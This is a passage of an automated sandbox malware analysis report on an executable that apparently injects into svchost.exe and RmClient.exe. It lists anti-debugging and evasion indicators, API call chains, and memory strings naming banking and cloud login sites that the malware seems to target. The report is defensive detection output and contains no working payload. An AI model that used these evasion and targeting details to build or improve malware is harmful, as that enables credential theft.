                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02A351B5 push edx; iretd 6_2_02A351C5
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_00545376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004E3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\RmClient.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\9MZZG92yMO.exeAPI/Special instruction interceptor: Address: 11090A4
                Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\RmClient.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E rdtsc 2_2_0387096E
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-101925
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeAPI coverage: 4.6 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\RmClient.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\RmClient.exe TID: 2052Thread sleep count: 44 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exe TID: 2052Thread sleep time: -88000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe TID: 4176Thread sleep time: -75000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\RmClient.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_0052445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0052445A
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_0052C6D1 FindFirstFileW,FindClose, 0_2_0052C6D1
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_0052C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0052C75C
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_0052EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0052EF95
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_0052F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0052F0F2
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_0052F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0052F3F3
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_005237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_005237EF
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_00523B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00523B12
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_0052BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0052BCBC
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_001CC0D0 FindFirstFileW,FindNextFileW,FindClose, 6_2_001CC0D0
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004C49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_004C49A0
                Source: 40182GJpK.6.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: XBOIFKGKIWT.exe, 00000008.00000002.4010904337.00000000007AF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
                Source: 40182GJpK.6.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 40182GJpK.6.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: RmClient.exe, 00000006.00000002.4015364519.00000000077C7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sswords blocklistVMware20,11696487552
                Source: 40182GJpK.6.dr | Binary or memory string: discord.comVMware20,11696487552f
                Source: 40182GJpK.6.dr | Binary or memory string: bankofamerica.comVMware20,11696487552x
                Source: RmClient.exe, 00000006.00000002.4015364519.00000000077C7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware20,1169648
                Source: RmClient.exe, 00000006.00000002.4015364519.00000000077C7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,116d
                Source: 40182GJpK.6.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 40182GJpK.6.dr | Binary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: RmClient.exe, 00000006.00000002.4015364519.00000000077C7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ansaction PasswordVMware20,11696487552
                Source: RmClient.exe, 00000006.00000002.4015364519.00000000077C7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,1169648M
                Source: RmClient.exe, 00000006.00000002.4015364519.00000000077C7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,1169648755
                Source: RmClient.exe, 00000006.00000002.4015364519.00000000077C7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware20,11696487552n
                Source: 40182GJpK.6.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 40182GJpK.6.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 40182GJpK.6.dr | Binary or memory string: global block list test formVMware20,11696487552
                Source: 40182GJpK.6.dr | Binary or memory string: tasks.office.comVMware20,11696487552o
                Source: RmClient.exe, 00000006.00000002.4015364519.00000000077C7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: omVMware20,11696
                Source: 40182GJpK.6.dr | Binary or memory string: AMC password management pageVMware20,11696487552
                Source: firefox.exe, 0000000A.00000002.2903779149.00000254FA69C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 40182GJpK.6.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: 40182GJpK.6.dr | Binary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 40182GJpK.6.dr | Binary or memory string: dev.azure.comVMware20,11696487552j
                Source: 40182GJpK.6.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 40182GJpK.6.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: RmClient.exe, 00000006.00000002.4015364519.00000000077C7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ve Brokers - HKVMware20,11696487552]
                Source: 40182GJpK.6.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: 40182GJpK.6.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 40182GJpK.6.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 40182GJpK.6.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 40182GJpK.6.dr | Binary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 40182GJpK.6.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: RmClient.exe, 00000006.00000002.4015364519.00000000077C7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ist test formVMware20,1169648755
                Source: 40182GJpK.6.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 40182GJpK.6.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 40182GJpK.6.dr | Binary or memory string: outlook.office.comVMware20,11696487552s
                Source: 40182GJpK.6.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 40182GJpK.6.dr | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 40182GJpK.6.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: RmClient.exe, 00000006.00000002.4010464904.000000000276D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
                Source: 40182GJpK.6.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 40182GJpK.6.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\RmClient.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0387096E rdtsc 2_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417263 LdrLoadDll, 2_2_00417263
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_00533F09 BlockInput, 0_2_00533F09
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004C3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_004C3B3A
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004F5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_004F5A7C
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004C4B37 LoadLibraryA,GetProcAddress, 0_2_004C4B37
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_01109310 mov eax, dword ptr fs:[00000030h] 0_2_01109310
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_01109370 mov eax, dword ptr fs:[00000030h] 0_2_01109370
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_01107CE0 mov eax, dword ptr fs:[00000030h] 0_2_01107CE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h] 2_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0385438F mov eax, dword ptr fs:[00000030h] 2_2_0385438F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h] 2_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038EC3CD mov eax, dword ptr fs:[00000030h] 2_2_038EC3CD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h] 2_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B63C0 mov eax, dword ptr fs:[00000030h] 2_2_038B63C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h] 2_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h] 2_2_038D43D4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h] 2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038663FF mov eax, dword ptr fs:[00000030h] 2_2_038663FF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h] 2_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382C310 mov ecx, dword ptr fs:[00000030h] 2_2_0382C310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03850310 mov ecx, dword ptr fs:[00000030h] 2_2_03850310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h] 2_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03908324 mov ecx, dword ptr fs:[00000030h] 2_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h] 2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h] 2_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B035C mov ecx, dword ptr fs:[00000030h] 2_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038FA352 mov eax, dword ptr fs:[00000030h] 2_2_038FA352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038D8350 mov ecx, dword ptr fs:[00000030h] 2_2_038D8350
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0390634F mov eax, dword ptr fs:[00000030h] 2_2_0390634F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038D437C mov eax, dword ptr fs:[00000030h] 2_2_038D437C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h] 2_2_0386E284
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h] 2_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h] 2_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039062D6 mov eax, dword ptr fs:[00000030h] 2_2_039062D6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h] 2_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382823B mov eax, dword ptr fs:[00000030h] 2_2_0382823B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B8243 mov eax, dword ptr fs:[00000030h] 2_2_038B8243
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B8243 mov ecx, dword ptr fs:[00000030h] 2_2_038B8243
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0390625D mov eax, dword ptr fs:[00000030h] 2_2_0390625D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382A250 mov eax, dword ptr fs:[00000030h] 2_2_0382A250
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03836259 mov eax, dword ptr fs:[00000030h] 2_2_03836259
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h] 2_2_038EA250
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h] 2_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382826B mov eax, dword ptr fs:[00000030h] 2_2_0382826B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h] 2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03870185 mov eax, dword ptr fs:[00000030h] 2_2_03870185
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h] 2_2_038EC188
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h] 2_2_038D4180
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h] 2_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h] 2_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h] 2_2_038F61C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038AE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039061E5 mov eax, dword ptr fs:[00000030h] 2_2_039061E5
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038601F8 mov eax, dword ptr fs:[00000030h] 2_2_038601F8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h] 2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h] 2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DA118 mov ecx, dword ptr fs:[00000030h] 2_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h] 2_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F0115 mov eax, dword ptr fs:[00000030h] 2_2_038F0115
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03860124 mov eax, dword ptr fs:[00000030h] 2_2_03860124
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h] 2_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C4144 mov ecx, dword ptr fs:[00000030h] 2_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382C156 mov eax, dword ptr fs:[00000030h] 2_2_0382C156
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C8158 mov eax, dword ptr fs:[00000030h] 2_2_038C8158
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03836154 mov eax, dword ptr fs:[00000030h] 2_2_03836154
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03904164 mov eax, dword ptr fs:[00000030h] 2_2_03904164
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0383208A mov eax, dword ptr fs:[00000030h] 2_2_0383208A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038280A0 mov eax, dword ptr fs:[00000030h] 2_2_038280A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C80A8 mov eax, dword ptr fs:[00000030h] 2_2_038C80A8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F60B8 mov eax, dword ptr fs:[00000030h] 2_2_038F60B8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F60B8 mov ecx, dword ptr fs:[00000030h] 2_2_038F60B8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B20DE mov eax, dword ptr fs:[00000030h] 2_2_038B20DE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382A0E3 mov ecx, dword ptr fs:[00000030h] 2_2_0382A0E3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038380E9 mov eax, dword ptr fs:[00000030h] 2_2_038380E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B60E0 mov eax, dword ptr fs:[00000030h] 2_2_038B60E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382C0F0 mov eax, dword ptr fs:[00000030h] 2_2_0382C0F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038720F0 mov ecx, dword ptr fs:[00000030h] 2_2_038720F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B4000 mov ecx, dword ptr fs:[00000030h] 2_2_038B4000
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h] 2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h] 2_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A020 mov eax, dword ptr fs:[00000030h]2_2_0382A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C020 mov eax, dword ptr fs:[00000030h]2_2_0382C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6030 mov eax, dword ptr fs:[00000030h]2_2_038C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832050 mov eax, dword ptr fs:[00000030h]2_2_03832050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6050 mov eax, dword ptr fs:[00000030h]2_2_038B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385C073 mov eax, dword ptr fs:[00000030h]2_2_0385C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D678E mov eax, dword ptr fs:[00000030h]2_2_038D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038307AF mov eax, dword ptr fs:[00000030h]2_2_038307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E47A0 mov eax, dword ptr fs:[00000030h]2_2_038E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383C7C0 mov eax, dword ptr fs:[00000030h]2_2_0383C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B07C3 mov eax, dword ptr fs:[00000030h]2_2_038B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE7E1 mov eax, dword ptr fs:[00000030h]2_2_038BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]2_2_038347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]2_2_038347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C700 mov eax, dword ptr fs:[00000030h]2_2_0386C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830710 mov eax, dword ptr fs:[00000030h]2_2_03830710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860710 mov eax, dword ptr fs:[00000030h]2_2_03860710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]2_2_0386C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]2_2_0386C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]2_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov ecx, dword ptr fs:[00000030h]2_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]2_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AC730 mov eax, dword ptr fs:[00000030h]2_2_038AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov esi, dword ptr fs:[00000030h]2_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]2_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]2_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830750 mov eax, dword ptr fs:[00000030h]2_2_03830750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE75D mov eax, dword ptr fs:[00000030h]2_2_038BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]2_2_03872750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]2_2_03872750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4755 mov eax, dword ptr fs:[00000030h]2_2_038B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838770 mov eax, dword ptr fs:[00000030h]2_2_03838770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
